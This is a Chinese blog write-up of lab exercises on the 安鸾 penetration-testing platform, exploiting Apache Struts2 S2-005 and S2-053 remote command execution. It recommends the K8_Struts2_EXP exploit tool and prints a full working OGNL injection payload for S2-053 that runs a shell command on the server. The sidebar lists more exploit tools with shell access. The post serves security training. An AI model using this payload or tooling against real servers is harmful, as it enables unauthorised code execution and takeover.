安鸾渗透Struts2 远程命令执行

最新推荐文章于 2024-04-29 01:54:48 发布
最新推荐文章于 2024-04-29 01:54:48 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: 安鸾渗透 文章标签: xss 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LHBD_R/article/details/120032536
版权

一.Struts2 远程命令执行(S2-005)

  1.         简介:
    1. struts2漏洞的起源源于S2-003
    2. S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过
    3. S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的
  2.         范围:
    1. 受影响版本: 低于Struts 2.0.12
  3.         漏洞复现:
    1. 安鸾渗透:http://www.whalwl.site:8088/login.jsp
    2. 了解到该漏洞就可以使用相关工具进行攻击,这边我推荐的是K8_Struts2_EXP,可以在k8网页上下载,网页下载地址:https://github.com/k8gege/K8tools/blob/master/K8_Struts2_EXP%20S2-045%20%26%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%2020170310.rar
    3. 打开工具,并准备好相关后台网页
    4. 随意输出账号密码,然后登录,获取url链接
    5. 会发现提示用户名不存在,此时获取我们需要的url链接,并复制到exe文件中
    6. 此时,我们已经获得root权限,然后就可以执行命令 

     

二.Struts2 远程命令执行(S2-053)

  1.         简介:
    1. 2017年9月7日,Apache Struts发布最新的安全公告
    2. 漏洞编号为CVE-2017-12611
    3. 当开发人员错误的Freemarker表达式构造方式时,可能会导致远程代码执行攻击
  2.         范围:

    1. Struts 2.0.1 – Sturts 2.3.33 and Struts 2.5 – Struts 2.5.10

  3.         漏洞复现:
    1. 安鸾渗透:http://www.whalwl.site:8027/hello.action
    2. 了解到相关信息之后,可以找到相关payload进行利用
    3. payload:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
    4. payload转载于https://blog.csdn.net/qq_29647709/article/details/84955205,老哥的使用步骤已经写出来了,我就不给各位大佬列出来了,各位大佬可以看看

最后祝大家早日把题目做完

                 

玖禁
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
K8_Struts2_EXP 20170310
12-14
K8_Struts2_EXP 20170310是一款用于检测项目是否存在Struts系列漏洞的工具,切勿用于恶意破坏,如果造成法律效应作者概不负责。切记,切记,切记!
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 994
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Struts2远程代码执行
最新发布
2302_79885863的博客
04-29 731
Struts2漏洞是一个经典的漏洞系列,根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。Struts2执行代码的原理:Struts2的动态性在于ongl表达式可以获取到运行变量的值,并且有机会执行函数调用。
[原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)
weixin_30446613的博客
01-12 7549
工具:K8Struts2Exploit组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2014/7/3110:24:56简介: K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)Struts2漏洞检测工具 Struts2漏洞测试工...
墨者学院 Apache Struts2远程代码执行漏洞(S2-016)
qq_43355651的博客
09-27 387
struts2漏洞 struts2漏洞:web应用框架之一 一般存在 登录 注册 留言 发生数据交互的地方 遇见 .action 这种后缀 多数会存在这种漏洞 整体思路我们可以使用burpsutie或awvs扫描 然后使用工具测试 这里用的墨者学院在线靶场Apache Struts2远程代码执行漏洞(S2-016) 打开网站我们能看到一个这样的界面 然后我们可以使用工具去扫描到.aciton 发现回显正常 然后我们使用一款K8_Struts2_EXP的工具测...
K8_Struts2_EXP.zip
09-27
]10 S2-045 CVE-2017-5638 支持GetShell/获取物理路径/执行CMD命令 [+]9 devMode CVE-xxxx-xxxx 支持GetShell/获取物理路径/执行CMD命令 [+]8 S2-037 CVE-2016-4438 支持GetShell/获取物理路径/执行CMD命令 [+]7 S2-032 CVE-2016-3081 支持GetShell/获取物理路径/执行CMD命令 [+]6 S2-020 CVE-2014-0094 支持GetShell (此洞特殊,EXP集成在飞刀) [+]5 S2-019 CVE-2013-4316 支持GetShell/获取物理路径/执行CMD命令 [+]4 S2-016 CVE-2013-2251 支持GetShell/获取物理路径/执行CMD命令 [+]3 S2-013 CVE-2013-1966 支持GetShell/获取物理路径/执行CMD命令 [+]2 S2-009 CVE-2011-3923 支持GetShell/获取物理路径/执行CMD命令 [+]1 S2-005 CVE-2010-1870 支持GetShell/获取物理路径/执行CMD命令/列文件目录
这些年,我们一直追逐的漏洞利用神器
03-30 229
我们来思考一个问题:如果一种漏洞类型,让你推荐一款与之强相关的漏洞利用神器,你会怎么推荐? 现在,我们所认为的漏洞利用工具神器,十年后,又该会是什么样子呢?可能大概也许就像我们现在看到啊d注入工具的样子吧。重复造轮子的人甚多,而能够称之为神器的工具甚少,在此感谢每一位安全开发者的无私奉献。 下面,我来给大家推荐几款我认为的漏洞利用神器,欢迎各位补充。 1、SQL注入漏洞 推荐项目:SQ...
Struts2远程命令执行验证工具
11-22
然而,Struts2在历史上出现过一些严重的安全漏洞,其中最具威胁性的之一是“Struts2远程命令执行”漏洞。这个标题提到的“Struts2远程命令执行验证工具”就是专门针对这类漏洞设计的检测和分析软件。 Struts2远程...
struts2远程命令执行环境包
10-09
struts2远程命令执行环境war包,想要深入学习深入到代码层的童鞋可以下载在本地搭建使用。
struts2远程命令执行环境搭建及录屏
10-09
struts2远程命令执行漏洞环境搭建以及录屏
K8 struts2利用工具
12-01
K8 struts2利用工具
K8Struts2Exploit(S2
11-10
解压密码:k8team[+]S2-020CVE-2014-0094支持GetShell(这洞特殊,EXP集成在飞刀)[+]S2-019CVE-2013-4316支持GetShell/获取物理路径/执行CMD命令[+]S2-016CVE-2013-2251支持GetShell/获取物理路径/执行CMD命令[+]S2-013CVE-2013-1966支持GetShell/获取物理路径/执行CMD命令[+]S2-009CVE-2011-3923支持GetShell/获取物理路径/执行CMD命令[+]S2-005CVE-2010-1870支持GetShell/获取物理路径/执行CMD命令/列文件目录-
K8_Struts2_漏洞利用工具解压密码:k8team
09-26
著名的K8_Struts2_漏洞利用工具,可利用Struts2_漏洞进行任意代码执行和任意文件上传。 本工具仅供学习交流,请勿用于任何非法活动。
K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具)
01-07
K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具)
K8 Struts2 Exploit 最新无后门版
03-08
K8 Struts2 Exploit 最新无后门版
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2 远程命令执行---检测.zip
11-15
本工具为漏洞自查工具,请勿非法攻击他人网站 支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2...https://github.com/HatBoy/Struts2-Scan
本地复现Struts2-053漏洞
dmra71403的博客
05-14 702
漏洞环境:http://192.168.253.131/ exp: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
apache struts2框架命令执行漏洞(s2-045、s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞。 s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值